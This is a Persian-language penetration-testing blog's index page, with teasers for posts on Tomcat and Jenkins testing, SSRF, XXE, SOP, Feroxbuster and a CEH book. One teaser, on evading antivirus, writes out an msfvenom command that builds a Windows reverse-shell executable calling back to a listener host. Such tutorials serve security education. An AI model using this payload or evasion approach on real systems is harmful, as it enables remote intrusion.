مقالات تست نفوذ

  • تست نفوذ Tomcat

    تست نفوذ Tomcat

    Tomcat Penetration Testing نقش حیاتی در شناسایی آسیب‌پذیری‌های موجود در Apache Tomcat ایفا می‌کند؛ سرویسی که به‌طور گسترده به‌عنوان یک web server و servlet container در توسعه‌ی برنامه‌های تحت وب مورد استفاده قرار می‌گیرد. در ابتدا، Apache Software Foundation این پروژه را با هدف ارائه‌ی یک پلتفرم نمایشی برای فناوری‌های Java Servlet و JavaServer Pages (JSP) راه‌اندازی کرد؛ فناوری‌هایی که…

    بیشتر بخوانید »
  • تست نفوذ Jenkins

    تست نفوذ Jenkins

    تست نفوذ Jenkins برای شناسایی آسیب‌پذیری‌های امنیتی در Jenkins ضروری است. Jenkins یک سرور اتوماسیون متن‌باز است که برای پیاده‌سازی پیوسته (Continuous Integration – CI) و تحویل پیوسته (Continuous Delivery – CD) استفاده می‌شود. این ابزار که بر پایه زبان برنامه‌نویسی جاوا ساخته شده است، از یک پلتفرم اسکریپت‌نویسی بهره می‌برد تا وظایفی مانند ساخت، تست و استقرار در چرخه…

    بیشتر بخوانید »
  • روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتی‌ویروس‌ها هنگام استفاده از شل‌کدها. ۴۸ مورد شناسایی از بین ۶۸ آنتی‌ویروس برای تست اولیه، یک پی‌لود Reverse Shell استاندارد با استفاده از Metasploit برای سیستم‌های ۳۲ بیتی ویندوز تولید می‌کنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…

    بیشتر بخوانید »
  • آموزش جامع ابزار Feroxbuster

    آموزش جامع ابزار Feroxbuster

    Feroxbusterیک ابزار قدرتمند است که برای شناسایی دایرکتوری‌ها (پوشه‌ها) و فایل‌ها روی سرورهای وب با استفاده از تکنیک‌های حمله Brute-force طراحی شده است. این ابزار معمولاً در تست نفوذ و ارزیابی‌های امنیتی برای شناسایی مسیرها و منابع پنهان‌شده مورد استفاده قرار می‌گیرد. در اینجا قصد داریم درباره وظایف و کارهای مختلفی که با استفاده از Feroxbuster می‌توان انجام داد، صحبت…

    بیشتر بخوانید »
  • نصب برنامه در کالی لینوکس

    نصب برنامه در کالی لینوکس

     احتمالا می‌دانید که یکی از مباحثی که در تست نفوذ باید نسبت به آن تسلط بالایی داشته باشید، کار با لینوکس و به‌خصوص کالی لینوکس است. یک راه ساده و تاثیرگذار برای یادگرفتن کار با کالی لینوکس هم نصب این سیستم‌ عامل به صورت مجازی یا مستقیم، و استفاده از آن به مدت طولانی است. اما برای کسانی که با…

    بیشتر بخوانید »
  • ssrf

    SSRF چیست؟ تشریح آسیب‌پذیری SSRF + دانلود مقاله

    در این مقاله توضیح می‌دهیم حمله‌ی SSRF (کوتاه‌شده‌ی Sever-Side Request Forgery) یا «تولید ریکوئست‌های سمت سرور» چیست؟ چند نمونه‎‌ی ساده از آن را تشریح می‌کنیم، و توضیح می‌دهیم چطور می‌توانید انواع آسیب‌پذیری‌های SSRF را شناسایی و اکسپلویت کنید. SSRF چیست؟ حملات SSRF چه عواقبی دارند؟ انواع رایج حملات SSRF حملات SSRF علیه خود سرور حملات SSRF علیه سیستم‌های بک‌اند دیگر…

    بیشتر بخوانید »
  • same origin policy

    SOP چیست؟

    سیاست مبدأ مشترک، Same Origin Policy یا به اختصار SOP، مکانیزمی امنیتی در مرورگررهای وب است که هدف آن جلوگیری از حمله‌کردن وبسایت‌ها به یکدیگر است. سیاست SOP اجازه نمی‌دهد اسکریپت‌های یک مبدأ (Origin)، به داده‌های یک مبدأ دیگر دسترسی داشته باشند. مبدأ یا Origin تشکیل شده از اسکیم URI، دامنه و شماره پورت. برای مثال، URL زیر را در…

    بیشتر بخوانید »
  • کتاب CEH v11

    دانلود کتاب CEH v11 | هکر قانونمند

    دوره هکر قانونمند یا CEH، یکی از معتبرترین گواهی‌نامه‌های هک اخلاقی است که برای سنجش مهارت و استخدام کارشناسان تست نفوذ توسط کارفرمایان در سراسر جهان مورد استفاده قرار می‌گیرد. در حقیقت این دوره به عنوان مقدماتی‌ترین دوره برای ورود تخصصی به حوزه‌های تست نفوذ و امنیت اطلاعات به شمار می‌رود. این دوره توسط موسسه EC-Council ارائه شده است و…

    بیشتر بخوانید »
  • آسیب‌پذیری XXE

    XML چیست و آسیب‌پذیری XXE چگونه به وجود می‌آید؟

    در این مقاله می‌خواهیم با مثال عملی و استفاده از کد، با آسیب‌پذیری XXE آشنا شویم. XXE یا XML External Entities، در لیست OWASP Top 10 برای آسیب‌پذیری‌های وب، در رتبه چهارم قرار دارد و بخش مهمی از حملات وب، حملات تزریق XXE هستند. اما برای این که بهتر بتوانیم این آسیب‌پذیری را درک کنیم، ابتدا باید آشنایی مختصری با…

    بیشتر بخوانید »
  • بهترین زبان برنامه نویسی برای هکر شدن چیست؟

    در هر حرفه و حوزه، مهارت‌هایی وجود دارند که یادگیری آن‌ها برای موفقیت ضروری است، یا زمان لازم برای رسیدن به اهداف مشخص را تا حد زیادی کاهش می‌دهند. به عنوان یک هکر هم مهارت‌هایی هستند که کسب آن‌ها به شما کمک می‌کند کار خود را بهتر، بهینه‌تر و سریع‌تر پیش ببرید. به‌طور مثال چند نمونه از این مهارت‌ها عبارتند…

    بیشتر بخوانید »
دکمه بازگشت به بالا